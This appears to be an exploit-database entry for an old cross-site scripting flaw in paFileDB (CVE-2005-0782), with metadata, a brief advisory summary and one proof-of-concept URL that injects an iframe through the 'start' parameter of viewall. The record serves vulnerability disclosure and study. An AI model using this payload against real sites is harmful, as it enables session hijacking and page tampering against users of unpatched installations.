PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' Cross-Site Scripting

Author: sp3x@securityreason.com
type: webapps
platform: php
port: 
date_added: 2005-03-12  
date_updated: 2013-05-05  
verified: 1  
codes: CVE-2005-0782;OSVDB-14841  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25215.txt  
source: https://www.securityfocus.com/bid/12788/info

Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts.

Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database.

http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe&gt;&amp;sortby=rating